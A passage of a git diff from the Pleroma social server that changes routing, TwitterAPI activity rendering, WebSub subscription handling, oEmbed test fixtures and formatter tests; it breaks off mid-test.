	plug(Pleroma.Plugs.UserEnabledPlug)
	plug(Pleroma.Plugs.SetUserSessionIdPlug)
	plug(Pleroma.Plugs.EnsureUserKeyPlug)
	end

	scope "/", Pleroma.Web.ActivityPub do
	pipe_through([:activitypub_client])

	get("/users/:nickname/inbox", ActivityPubController, :read_inbox)
	post("/users/:nickname/outbox", ActivityPubController, :update_outbox)
	end

	scope "/relay", Pleroma.Web.ActivityPub do
	pipe_through(:ap_relay)
	get("/", ActivityPubController, :relay)
	end

	scope "/", Pleroma.Web.ActivityPub do
	pipe_through(:activitypub)
	post("/users/:nickname/inbox", ActivityPubController, :inbox)
	post("/inbox", ActivityPubController, :inbox)
	end

	scope "/.well-known", Pleroma.Web do
	pipe_through(:well_known)

	get("/host-meta", WebFinger.WebFingerController, :host_meta)
	get("/webfinger", WebFinger.WebFingerController, :webfinger)
	get("/nodeinfo", Nodeinfo.NodeinfoController, :schemas)
	end

	scope "/nodeinfo", Pleroma.Web do
	get("/:version", Nodeinfo.NodeinfoController, :nodeinfo)
	end

	scope "/", Pleroma.Web.MastodonAPI do
	pipe_through(:mastodon_html)

	get("/web/login", MastodonAPIController, :login)
	post("/web/login", MastodonAPIController, :login_post)
	get("/web/*path", MastodonAPIController, :index)
	delete("/auth/sign_out", MastodonAPIController, :logout)
	end

	pipeline :remote_media do
	end

	scope "/proxy/", Pleroma.Web.MediaProxy do
	pipe_through(:remote_media)
	get("/:sig/:url", MediaProxyController, :remote)
	get("/:sig/:url/:filename", MediaProxyController, :remote)
	end

	if Mix.env() == :dev do
	scope "/dev" do
	pipe_through([:mailbox_preview])

	forward("/mailbox", Plug.Swoosh.MailboxPreview, base_path: "/dev/mailbox")
	end
	end

	scope "/", Fallback do
	get("/registration/:token", RedirectController, :registration_page)
	get("/:maybe_nickname_or_id", RedirectController, :redirector_with_meta)
	get("/*path", RedirectController, :redirector)

	options("/*path", RedirectController, :empty)
	end
	end

	defmodule Fallback.RedirectController do
	use Pleroma.Web, :controller
	alias Pleroma.Web.Metadata
	alias Pleroma.User

	def redirector(conn, _params) do
	conn
	\|> put_resp_content_type("text/html")
	\|> send_file(200, index_file_path())
	end

	def redirector_with_meta(conn, %{"maybe_nickname_or_id" => maybe_nickname_or_id} = params) do
	with %User{} = user <- User.get_cached_by_nickname_or_id(maybe_nickname_or_id) do
	redirector_with_meta(conn, %{user: user})
	else
	nil ->
	redirector(conn, params)
	end
	end

	def redirector_with_meta(conn, params) do
	{:ok, index_content} = File.read(index_file_path())
	tags = Metadata.build_tags(params)
	response = String.replace(index_content, "<!--server-generated-meta-->", tags)

	conn
	\|> put_resp_content_type("text/html")
	\|> send_resp(200, response)
	end

	def index_file_path do
	Pleroma.Plugs.InstanceStatic.file_path("index.html")
	end

	def registration_page(conn, params) do
	redirector(conn, params)
	end

	def empty(conn, _params) do
	conn
	\|> put_status(204)
	\|> text("")
	end
	end
	diff --git a/lib/pleroma/web/twitter_api/views/activity_view.ex b/lib/pleroma/web/twitter_api/views/activity_view.ex
	index 108e7bfc5..03708d84c 100644
	--- a/lib/pleroma/web/twitter_api/views/activity_view.ex
	+++ b/lib/pleroma/web/twitter_api/views/activity_view.ex
	@@ -1,355 +1,345 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.TwitterAPI.ActivityView do
	use Pleroma.Web, :view
	alias Pleroma.Web.CommonAPI.Utils
	alias Pleroma.User
	alias Pleroma.Web.TwitterAPI.UserView
	alias Pleroma.Web.TwitterAPI.ActivityView
	alias Pleroma.Web.TwitterAPI.TwitterAPI
	alias Pleroma.Web.TwitterAPI.Representers.ObjectRepresenter
	alias Pleroma.Activity
	alias Pleroma.HTML
	alias Pleroma.Object
	alias Pleroma.User
	alias Pleroma.Repo
	alias Pleroma.Formatter

	import Ecto.Query
	require Logger

	defp query_context_ids([]), do: []

	defp query_context_ids(contexts) do
	query = from(o in Object, where: fragment("(?)->>'id' = ANY(?)", o.data, ^contexts))

	Repo.all(query)
	end

	defp query_users([]), do: []

	defp query_users(user_ids) do
	query = from(user in User, where: user.ap_id in ^user_ids)

	Repo.all(query)
	end

	defp collect_context_ids(activities) do
	_contexts =
	activities
	\|> Enum.reject(& &1.data["context_id"])
	\|> Enum.map(fn %{data: data} ->
	data["context"]
	end)
	\|> Enum.filter(& &1)
	\|> query_context_ids()
	\|> Enum.reduce(%{}, fn %{data: %{"id" => ap_id}, id: id}, acc ->
	Map.put(acc, ap_id, id)
	end)
	end

	defp collect_users(activities) do
	activities
	\|> Enum.map(fn activity ->
	case activity.data do
	data = %{"type" => "Follow"} ->
	[data["actor"], data["object"]]

	data ->
	[data["actor"]]
	end ++ activity.recipients
	end)
	\|> List.flatten()
	\|> Enum.uniq()
	\|> query_users()
	\|> Enum.reduce(%{}, fn user, acc ->
	Map.put(acc, user.ap_id, user)
	end)
	end

	defp get_context_id(%{data: %{"context_id" => context_id}}, _) when not is_nil(context_id),
	do: context_id

	defp get_context_id(%{data: %{"context" => nil}}, _), do: nil

	defp get_context_id(%{data: %{"context" => context}}, options) do
	cond do
	id = options[:context_ids][context] -> id
	true -> TwitterAPI.context_to_conversation_id(context)
	end
	end

	defp get_context_id(_, _), do: nil

	defp get_user(ap_id, opts) do
	cond do
	user = opts[:users][ap_id] ->
	user

	String.ends_with?(ap_id, "/followers") ->
	nil

	ap_id == "https://www.w3.org/ns/activitystreams#Public" ->
	nil

	user = User.get_cached_by_ap_id(ap_id) ->
	user

	user = User.get_by_guessed_nickname(ap_id) ->
	user

	true ->
	- error_user(ap_id)
	+ User.error_user(ap_id)
	end
	end

	- defp error_user(ap_id) do
	- %User{
	- name: ap_id,
	- ap_id: ap_id,
	- info: %User.Info{},
	- nickname: "erroruser@example.com",
	- inserted_at: NaiveDateTime.utc_now()
	- }
	- end
	-
	def render("index.json", opts) do
	context_ids = collect_context_ids(opts.activities)
	users = collect_users(opts.activities)

	opts =
	opts
	\|> Map.put(:context_ids, context_ids)
	\|> Map.put(:users, users)

	render_many(
	opts.activities,
	ActivityView,
	"activity.json",
	opts
	)
	end

	def render("activity.json", %{activity: %{data: %{"type" => "Delete"}} = activity} = opts) do
	user = get_user(activity.data["actor"], opts)
	created_at = activity.data["published"] \|> Utils.date_to_asctime()

	%{
	"id" => activity.id,
	"uri" => activity.data["object"],
	"user" => UserView.render("show.json", %{user: user, for: opts[:for]}),
	"attentions" => [],
	"statusnet_html" => "deleted notice {{tag",
	"text" => "deleted notice {{tag",
	"is_local" => activity.local,
	"is_post_verb" => false,
	"created_at" => created_at,
	"in_reply_to_status_id" => nil,
	"external_url" => activity.data["id"],
	"activity_type" => "delete"
	}
	end

	def render("activity.json", %{activity: %{data: %{"type" => "Follow"}} = activity} = opts) do
	user = get_user(activity.data["actor"], opts)
	created_at = activity.data["published"] \|\| DateTime.to_iso8601(activity.inserted_at)
	created_at = created_at \|> Utils.date_to_asctime()

	followed = get_user(activity.data["object"], opts)
	text = "#{user.nickname} started following #{followed.nickname}"

	%{
	"id" => activity.id,
	"user" => UserView.render("show.json", %{user: user, for: opts[:for]}),
	"attentions" => [],
	"statusnet_html" => text,
	"text" => text,
	"is_local" => activity.local,
	"is_post_verb" => false,
	"created_at" => created_at,
	"in_reply_to_status_id" => nil,
	"external_url" => activity.data["id"],
	"activity_type" => "follow"
	}
	end

	def render("activity.json", %{activity: %{data: %{"type" => "Announce"}} = activity} = opts) do
	user = get_user(activity.data["actor"], opts)
	created_at = activity.data["published"] \|> Utils.date_to_asctime()
	announced_activity = Activity.get_create_activity_by_object_ap_id(activity.data["object"])

	text = "#{user.nickname} retweeted a status."

	retweeted_status = render("activity.json", Map.merge(opts, %{activity: announced_activity}))

	%{
	"id" => activity.id,
	"user" => UserView.render("show.json", %{user: user, for: opts[:for]}),
	"statusnet_html" => text,
	"text" => text,
	"is_local" => activity.local,
	"is_post_verb" => false,
	"uri" => "tag:#{activity.data["id"]}:objectType=note",
	"created_at" => created_at,
	"retweeted_status" => retweeted_status,
	"statusnet_conversation_id" => get_context_id(announced_activity, opts),
	"external_url" => activity.data["id"],
	"activity_type" => "repeat"
	}
	end

	def render("activity.json", %{activity: %{data: %{"type" => "Like"}} = activity} = opts) do
	user = get_user(activity.data["actor"], opts)
	liked_activity = Activity.get_create_activity_by_object_ap_id(activity.data["object"])
	liked_activity_id = if liked_activity, do: liked_activity.id, else: nil

	created_at =
	activity.data["published"]
	\|> Utils.date_to_asctime()

	text = "#{user.nickname} favorited a status."

	favorited_status =
	if liked_activity,
	do: render("activity.json", Map.merge(opts, %{activity: liked_activity})),
	else: nil

	%{
	"id" => activity.id,
	"user" => UserView.render("show.json", %{user: user, for: opts[:for]}),
	"statusnet_html" => text,
	"text" => text,
	"is_local" => activity.local,
	"is_post_verb" => false,
	"uri" => "tag:#{activity.data["id"]}:objectType=Favourite",
	"created_at" => created_at,
	"favorited_status" => favorited_status,
	"in_reply_to_status_id" => liked_activity_id,
	"external_url" => activity.data["id"],
	"activity_type" => "like"
	}
	end

	def render(
	"activity.json",
	%{activity: %{data: %{"type" => "Create", "object" => object}} = activity} = opts
	) do
	user = get_user(activity.data["actor"], opts)

	created_at = object["published"] \|> Utils.date_to_asctime()
	like_count = object["like_count"] \|\| 0
	announcement_count = object["announcement_count"] \|\| 0
	favorited = opts[:for] && opts[:for].ap_id in (object["likes"] \|\| [])
	repeated = opts[:for] && opts[:for].ap_id in (object["announcements"] \|\| [])
	pinned = activity.id in user.info.pinned_activities

	attentions =
	activity.recipients
	\|> Enum.map(fn ap_id -> get_user(ap_id, opts) end)
	\|> Enum.filter(& &1)
	\|> Enum.map(fn user -> UserView.render("show.json", %{user: user, for: opts[:for]}) end)

	conversation_id = get_context_id(activity, opts)

	tags = activity.data["object"]["tag"] \|\| []
	possibly_sensitive = activity.data["object"]["sensitive"] \|\| Enum.member?(tags, "nsfw")

	tags = if possibly_sensitive, do: Enum.uniq(["nsfw" \| tags]), else: tags

	{summary, content} = render_content(object)

	html =
	content
	\|> HTML.get_cached_scrubbed_html_for_object(
	User.html_filter_policy(opts[:for]),
	activity,
	__MODULE__
	)
	\|> Formatter.emojify(object["emoji"])

	text =
	if content do
	content
	\|> String.replace(~r/<br\s?\/?>/, "\n")
	\|> HTML.get_cached_stripped_html_for_object(activity, __MODULE__)
	end

	reply_parent = Activity.get_in_reply_to_activity(activity)

	reply_user = reply_parent && User.get_cached_by_ap_id(reply_parent.actor)

	summary = HTML.strip_tags(summary)

	%{
	"id" => activity.id,
	"uri" => activity.data["object"]["id"],
	"user" => UserView.render("show.json", %{user: user, for: opts[:for]}),
	"statusnet_html" => html,
	"text" => text,
	"is_local" => activity.local,
	"is_post_verb" => true,
	"created_at" => created_at,
	"in_reply_to_status_id" => object["inReplyToStatusId"],
	"in_reply_to_screen_name" => reply_user && reply_user.nickname,
	"in_reply_to_profileurl" => User.profile_url(reply_user),
	"in_reply_to_ostatus_uri" => reply_user && reply_user.ap_id,
	"in_reply_to_user_id" => reply_user && reply_user.id,
	"statusnet_conversation_id" => conversation_id,
	"attachments" => (object["attachment"] \|\| []) \|> ObjectRepresenter.enum_to_list(opts),
	"attentions" => attentions,
	"fave_num" => like_count,
	"repeat_num" => announcement_count,
	"favorited" => !!favorited,
	"repeated" => !!repeated,
	"pinned" => pinned,
	"external_url" => object["external_url"] \|\| object["id"],
	"tags" => tags,
	"activity_type" => "post",
	"possibly_sensitive" => possibly_sensitive,
	"visibility" => Pleroma.Web.MastodonAPI.StatusView.get_visibility(object),
	"summary" => summary,
	"summary_html" => summary \|> Formatter.emojify(object["emoji"])
	}
	end

	def render("activity.json", %{activity: unhandled_activity}) do
	Logger.warn("#{__MODULE__} unhandled activity: #{inspect(unhandled_activity)}")
	nil
	end

	def render_content(%{"type" => "Note"} = object) do
	summary = object["summary"]

	content =
	if !!summary and summary != "" do
	"<p>#{summary}</p>#{object["content"]}"
	else
	object["content"]
	end

	{summary, content}
	end

	def render_content(%{"type" => object_type} = object)
	when object_type in ["Article", "Page", "Video"] do
	summary = object["name"] \|\| object["summary"]

	content =
	if !!summary and summary != "" and is_bitstring(object["url"]) do
	"<p><a href=\"#{object["url"]}\">#{summary}</a></p>#{object["content"]}"
	else
	object["content"]
	end

	{summary, content}
	end

	def render_content(object) do
	summary = object["summary"] \|\| "Unhandled activity type: #{object["type"]}"
	content = "<p>#{summary}</p>#{object["content"]}"

	{summary, content}
	end
	end
	diff --git a/lib/pleroma/web/websub/websub.ex b/lib/pleroma/web/websub/websub.ex
	index 3a287edd9..7ca62c83b 100644
	--- a/lib/pleroma/web/websub/websub.ex
	+++ b/lib/pleroma/web/websub/websub.ex
	@@ -1,281 +1,287 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.Websub do
	alias Ecto.Changeset
	alias Pleroma.Repo
	alias Pleroma.Web.Websub.{WebsubServerSubscription, WebsubClientSubscription}
	alias Pleroma.Web.OStatus.FeedRepresenter
	alias Pleroma.Web.{XML, Endpoint, OStatus}
	alias Pleroma.Web.Router.Helpers
	require Logger

	import Ecto.Query

	@httpoison Application.get_env(:pleroma, :httpoison)

	def verify(subscription, getter \\ &@httpoison.get/3) do
	challenge = Base.encode16(:crypto.strong_rand_bytes(8))
	lease_seconds = NaiveDateTime.diff(subscription.valid_until, subscription.updated_at)
	lease_seconds = lease_seconds \|> to_string

	params = %{
	"hub.challenge": challenge,
	"hub.lease_seconds": lease_seconds,
	"hub.topic": subscription.topic,
	"hub.mode": "subscribe"
	}

	url = hd(String.split(subscription.callback, "?"))
	query = URI.parse(subscription.callback).query \|\| ""
	params = Map.merge(params, URI.decode_query(query))

	with {:ok, response} <- getter.(url, [], params: params),
	^challenge <- response.body do
	changeset = Changeset.change(subscription, %{state: "active"})
	Repo.update(changeset)
	else
	e ->
	Logger.debug("Couldn't verify subscription")
	Logger.debug(inspect(e))
	{:error, subscription}
	end
	end

	@supported_activities [
	"Create",
	"Follow",
	"Like",
	"Announce",
	"Undo",
	"Delete"
	]
	def publish(topic, user, %{data: %{"type" => type}} = activity)
	when type in @supported_activities do
	# TODO: Only send to still valid subscriptions.
	query =
	from(
	sub in WebsubServerSubscription,
	where: sub.topic == ^topic and sub.state == "active",
	where: fragment("? > NOW()", sub.valid_until)
	)

	subscriptions = Repo.all(query)

	Enum.each(subscriptions, fn sub ->
	response =
	user
	\|> FeedRepresenter.to_simple_form([activity], [user])
	\|> :xmerl.export_simple(:xmerl_xml)
	\|> to_string

	data = %{
	xml: response,
	topic: topic,
	callback: sub.callback,
	secret: sub.secret
	}

	Pleroma.Web.Federator.enqueue(:publish_single_websub, data)
	end)
	end

	def publish(_, _, _), do: ""

	def sign(secret, doc) do
	:crypto.hmac(:sha, secret, to_string(doc)) \|> Base.encode16() \|> String.downcase()
	end

	def incoming_subscription_request(user, %{"hub.mode" => "subscribe"} = params) do
	with {:ok, topic} <- valid_topic(params, user),
	{:ok, lease_time} <- lease_time(params),
	secret <- params["hub.secret"],
	callback <- params["hub.callback"] do
	subscription = get_subscription(topic, callback)

	data = %{
	state: subscription.state \|\| "requested",
	topic: topic,
	secret: secret,
	callback: callback
	}

	change = Changeset.change(subscription, data)
	websub = Repo.insert_or_update!(change)

	change =
	Changeset.change(websub, %{valid_until: NaiveDateTime.add(websub.updated_at, lease_time)})

	websub = Repo.update!(change)

	Pleroma.Web.Federator.enqueue(:verify_websub, websub)

	{:ok, websub}
	else
	{:error, reason} ->
	Logger.debug("Couldn't create subscription")
	Logger.debug(inspect(reason))

	{:error, reason}
	end
	end

	+ def incoming_subscription_request(user, params) do
	+ Logger.info("Unhandled WebSub request for #{user.nickname}: #{inspect(params)}")
	+
	+ {:error, "Invalid WebSub request"}
	+ end
	+
	defp get_subscription(topic, callback) do
	Repo.get_by(WebsubServerSubscription, topic: topic, callback: callback) \|\|
	%WebsubServerSubscription{}
	end

	# Temp hack for mastodon.
	defp lease_time(%{"hub.lease_seconds" => ""}) do
	# three days
	{:ok, 60 * 60 * 24 * 3}
	end

	defp lease_time(%{"hub.lease_seconds" => lease_seconds}) do
	{:ok, String.to_integer(lease_seconds)}
	end

	defp lease_time(_) do
	# three days
	{:ok, 60 * 60 * 24 * 3}
	end

	defp valid_topic(%{"hub.topic" => topic}, user) do
	if topic == OStatus.feed_path(user) do
	{:ok, OStatus.feed_path(user)}
	else
	{:error, "Wrong topic requested, expected #{OStatus.feed_path(user)}, got #{topic}"}
	end
	end

	def subscribe(subscriber, subscribed, requester \\ &request_subscription/1) do
	topic = subscribed.info.topic
	# FIXME: Race condition, use transactions
	{:ok, subscription} =
	with subscription when not is_nil(subscription) <-
	Repo.get_by(WebsubClientSubscription, topic: topic) do
	subscribers = [subscriber.ap_id \| subscription.subscribers] \|> Enum.uniq()
	change = Ecto.Changeset.change(subscription, %{subscribers: subscribers})
	Repo.update(change)
	else
	_e ->
	subscription = %WebsubClientSubscription{
	topic: topic,
	hub: subscribed.info.hub,
	subscribers: [subscriber.ap_id],
	state: "requested",
	secret: :crypto.strong_rand_bytes(8) \|> Base.url_encode64(),
	user: subscribed
	}

	Repo.insert(subscription)
	end

	requester.(subscription)
	end

	def gather_feed_data(topic, getter \\ &@httpoison.get/1) do
	with {:ok, response} <- getter.(topic),
	status when status in 200..299 <- response.status,
	body <- response.body,
	doc <- XML.parse_document(body),
	uri when not is_nil(uri) <- XML.string_from_xpath("/feed/author[1]/uri", doc),
	hub when not is_nil(hub) <- XML.string_from_xpath(~S{/feed/link[@rel="hub"]/@href}, doc) do
	name = XML.string_from_xpath("/feed/author[1]/name", doc)
	preferredUsername = XML.string_from_xpath("/feed/author[1]/poco:preferredUsername", doc)
	displayName = XML.string_from_xpath("/feed/author[1]/poco:displayName", doc)
	avatar = OStatus.make_avatar_object(doc)
	bio = XML.string_from_xpath("/feed/author[1]/summary", doc)

	{:ok,
	%{
	"uri" => uri,
	"hub" => hub,
	"nickname" => preferredUsername \|\| name,
	"name" => displayName \|\| name,
	"host" => URI.parse(uri).host,
	"avatar" => avatar,
	"bio" => bio
	}}
	else
	e ->
	{:error, e}
	end
	end

	def request_subscription(websub, poster \\ &@httpoison.post/3, timeout \\ 10_000) do
	data = [
	"hub.mode": "subscribe",
	"hub.topic": websub.topic,
	"hub.secret": websub.secret,
	"hub.callback": Helpers.websub_url(Endpoint, :websub_subscription_confirmation, websub.id)
	]

	# This checks once a second if we are confirmed yet
	websub_checker = fn ->
	helper = fn helper ->
	:timer.sleep(1000)
	websub = Repo.get_by(WebsubClientSubscription, id: websub.id, state: "accepted")
	if websub, do: websub, else: helper.(helper)
	end

	helper.(helper)
	end

	task = Task.async(websub_checker)

	with {:ok, %{status: 202}} <-
	poster.(websub.hub, {:form, data}, "Content-type": "application/x-www-form-urlencoded"),
	{:ok, websub} <- Task.yield(task, timeout) do
	{:ok, websub}
	else
	e ->
	Task.shutdown(task)

	change = Ecto.Changeset.change(websub, %{state: "rejected"})
	{:ok, websub} = Repo.update(change)

	Logger.debug(fn -> "Couldn't confirm subscription: #{inspect(websub)}" end)
	Logger.debug(fn -> "error: #{inspect(e)}" end)

	{:error, websub}
	end
	end

	def refresh_subscriptions(delta \\ 60 * 60 * 24) do
	Logger.debug("Refreshing subscriptions")

	cut_off = NaiveDateTime.add(NaiveDateTime.utc_now(), delta)

	query = from(sub in WebsubClientSubscription, where: sub.valid_until < ^cut_off)

	subs = Repo.all(query)

	Enum.each(subs, fn sub ->
	Pleroma.Web.Federator.enqueue(:request_subscription, sub)
	end)
	end

	def publish_one(%{xml: xml, topic: topic, callback: callback, secret: secret}) do
	signature = sign(secret \|\| "", xml)
	Logger.info(fn -> "Pushing #{topic} to #{callback}" end)

	with {:ok, %{status: code}} <-
	@httpoison.post(
	callback,
	xml,
	[
	{"Content-Type", "application/atom+xml"},
	{"X-Hub-Signature", "sha1=#{signature}"}
	]
	) do
	Logger.info(fn -> "Pushed to #{callback}, code #{code}" end)
	{:ok, code}
	else
	e ->
	Logger.debug(fn -> "Couldn't push to #{callback}, #{inspect(e)}" end)
	{:error, e}
	end
	end
	end
	diff --git a/lib/pleroma/web/websub/websub_controller.ex b/lib/pleroma/web/websub/websub_controller.ex
	index 27304d988..e58f144e5 100644
	--- a/lib/pleroma/web/websub/websub_controller.ex
	+++ b/lib/pleroma/web/websub/websub_controller.ex
	@@ -1,88 +1,95 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.Websub.WebsubController do
	use Pleroma.Web, :controller
	alias Pleroma.{Repo, User}
	alias Pleroma.Web.{Websub, Federator}
	alias Pleroma.Web.Websub.WebsubClientSubscription
	require Logger

	plug(
	Pleroma.Web.FederatingPlug
	when action in [
	:websub_subscription_request,
	:websub_subscription_confirmation,
	:websub_incoming
	]
	)

	def websub_subscription_request(conn, %{"nickname" => nickname} = params) do
	user = User.get_cached_by_nickname(nickname)

	with {:ok, _websub} <- Websub.incoming_subscription_request(user, params) do
	conn
	\|> send_resp(202, "Accepted")
	else
	{:error, reason} ->
	conn
	\|> send_resp(500, reason)
	end
	end

	# TODO: Extract this into the Websub module
	def websub_subscription_confirmation(
	conn,
	%{
	"id" => id,
	"hub.mode" => "subscribe",
	"hub.challenge" => challenge,
	"hub.topic" => topic
	} = params
	) do
	Logger.debug("Got WebSub confirmation")
	Logger.debug(inspect(params))

	lease_seconds =
	if params["hub.lease_seconds"] do
	String.to_integer(params["hub.lease_seconds"])
	else
	# Guess 3 days
	60 * 60 * 24 * 3
	end

	with %WebsubClientSubscription{} = websub <-
	Repo.get_by(WebsubClientSubscription, id: id, topic: topic) do
	valid_until = NaiveDateTime.add(NaiveDateTime.utc_now(), lease_seconds)
	change = Ecto.Changeset.change(websub, %{state: "accepted", valid_until: valid_until})
	{:ok, _websub} = Repo.update(change)

	conn
	\|> send_resp(200, challenge)
	else
	_e ->
	conn
	\|> send_resp(500, "Error")
	end
	end

	+ def websub_subscription_confirmation(conn, params) do
	+ Logger.info("Invalid WebSub confirmation request: #{inspect(params)}")
	+
	+ conn
	+ \|> send_resp(500, "Invalid parameters")
	+ end
	+
	def websub_incoming(conn, %{"id" => id}) do
	with "sha1=" <> signature <- hd(get_req_header(conn, "x-hub-signature")),
	signature <- String.downcase(signature),
	%WebsubClientSubscription{} = websub <- Repo.get(WebsubClientSubscription, id),
	{:ok, body, _conn} = read_body(conn),
	^signature <- Websub.sign(websub.secret, body) do
	Federator.enqueue(:incoming_doc, body)

	conn
	\|> send_resp(200, "OK")
	else
	_e ->
	Logger.debug("Can't handle incoming subscription post")

	conn
	\|> send_resp(500, "Error")
	end
	end
	end
	diff --git a/test/fixtures/rich_media/oembed.html b/test/fixtures/rich_media/oembed.html
	new file mode 100644
	index 000000000..55f17004b
	--- /dev/null
	+++ b/test/fixtures/rich_media/oembed.html
	@@ -0,0 +1,3 @@
	+<link rel="alternate" type="application/json+oembed"
	+ href="http://example.com/oembed.json"
	+ title="Bacon Lollys oEmbed Profile" />
	diff --git a/test/fixtures/rich_media/oembed.json b/test/fixtures/rich_media/oembed.json
	new file mode 100644
	index 000000000..2a5f7a771
	--- /dev/null
	+++ b/test/fixtures/rich_media/oembed.json
	@@ -0,0 +1 @@
	+{"type":"photo","flickr_type":"photo","title":"Bacon Lollys","author_name":"\u202e\u202d\u202cbees\u202c","author_url":"https:\/\/www.flickr.com\/photos\/bees\/","width":"1024","height":"768","url":"https:\/\/farm4.staticflickr.com\/3040\/2362225867_4a87ab8baf_b.jpg","web_page":"https:\/\/www.flickr.com\/photos\/bees\/2362225867\/","thumbnail_url":"https:\/\/farm4.staticflickr.com\/3040\/2362225867_4a87ab8baf_q.jpg","thumbnail_width":150,"thumbnail_height":150,"web_page_short_url":"https:\/\/flic.kr\/p\/4AK2sc","license":"All Rights Reserved","license_id":0,"html":"<a data-flickr-embed=\"true\" href=\"https:\/\/www.flickr.com\/photos\/bees\/2362225867\/\" title=\"Bacon Lollys by \u202e\u202d\u202cbees\u202c, on Flickr\"><img src=\"https:\/\/farm4.staticflickr.com\/3040\/2362225867_4a87ab8baf_b.jpg\" width=\"1024\" height=\"768\" alt=\"Bacon Lollys\"><\/a><script async src=\"https:\/\/embedr.flickr.com\/assets\/client-code.js\" charset=\"utf-8\"><\/script>","version":"1.0","cache_age":3600,"provider_name":"Flickr","provider_url":"https:\/\/www.flickr.com\/"}
	diff --git a/test/formatter_test.exs b/test/formatter_test.exs
	index c76149e38..bd8844458 100644
	--- a/test/formatter_test.exs
	+++ b/test/formatter_test.exs
	@@ -1,300 +1,302 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2018 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.FormatterTest do
	alias Pleroma.Formatter
	alias Pleroma.User
	use Pleroma.DataCase

	import Pleroma.Factory

	setup_all do
	Tesla.Mock.mock_global(fn env -> apply(HttpRequestMock, :request, [env]) end)
	:ok
	end

	describe ".add_hashtag_links" do
	test "turns hashtags into links" do
	text = "I love #cofe and #2hu"

	expected_text =
	- "I love <a data-tag='cofe' href='http://localhost:4001/tag/cofe' rel='tag'>#cofe</a> and <a data-tag='2hu' href='http://localhost:4001/tag/2hu' rel='tag'>#2hu</a>"
	+ "I love <a class='hashtag' data-tag='cofe' href='http://localhost:4001/tag/cofe' rel='tag'>#cofe</a> and <a class='hashtag' data-tag='2hu' href='http://localhost:4001/tag/2hu' rel='tag'>#2hu</a>"

	tags = Formatter.parse_tags(text)

	assert expected_text ==
	Formatter.add_hashtag_links({[], text}, tags) \|> Formatter.finalize()
	end

	test "does not turn html characters to tags" do
	text = "Fact #3: pleroma does what mastodon't"

	expected_text =
	- "Fact <a data-tag='3' href='http://localhost:4001/tag/3' rel='tag'>#3</a>: pleroma does what mastodon't"
	+ "Fact <a class='hashtag' data-tag='3' href='http://localhost:4001/tag/3' rel='tag'>#3</a>: pleroma does what mastodon't"

	tags = Formatter.parse_tags(text)

	assert expected_text ==
	Formatter.add_hashtag_links({[], text}, tags) \|> Formatter.finalize()
	end
	end

	describe ".add_links" do
	test "turning urls into links" do
	text = "Hey, check out https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla ."

	expected =
	"Hey, check out <a href=\"https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla\">https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla</a> ."

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "https://mastodon.social/@lambadalambda"

	expected =
	"<a href=\"https://mastodon.social/@lambadalambda\">https://mastodon.social/@lambadalambda</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "https://mastodon.social:4000/@lambadalambda"

	expected =
	"<a href=\"https://mastodon.social:4000/@lambadalambda\">https://mastodon.social:4000/@lambadalambda</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "@lambadalambda"
	expected = "@lambadalambda"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "http://www.cs.vu.nl/~ast/intel/"
	expected = "<a href=\"http://www.cs.vu.nl/~ast/intel/\">http://www.cs.vu.nl/~ast/intel/</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "https://forum.zdoom.org/viewtopic.php?f=44&t=57087"

	expected =
	"<a href=\"https://forum.zdoom.org/viewtopic.php?f=44&t=57087\">https://forum.zdoom.org/viewtopic.php?f=44&t=57087</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "https://en.wikipedia.org/wiki/Sophia_(Gnosticism)#Mythos_of_the_soul"

	expected =
	"<a href=\"https://en.wikipedia.org/wiki/Sophia_(Gnosticism)#Mythos_of_the_soul\">https://en.wikipedia.org/wiki/Sophia_(Gnosticism)#Mythos_of_the_soul</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "https://www.google.co.jp/search?q=Nasim+Aghdam"

	expected =
	"<a href=\"https://www.google.co.jp/search?q=Nasim+Aghdam\">https://www.google.co.jp/search?q=Nasim+Aghdam</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "https://en.wikipedia.org/wiki/Duff's_device"

	expected =
	"<a href=\"https://en.wikipedia.org/wiki/Duff's_device\">https://en.wikipedia.org/wiki/Duff's_device</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "https://pleroma.com https://pleroma.com/sucks"

	expected =
	"<a href=\"https://pleroma.com\">https://pleroma.com</a> <a href=\"https://pleroma.com/sucks\">https://pleroma.com/sucks</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text = "xmpp:contact@hacktivis.me"

	expected = "<a href=\"xmpp:contact@hacktivis.me\">xmpp:contact@hacktivis.me</a>"

	assert Formatter.add_links({[], text}) \|> Formatter.finalize() == expected

	text =
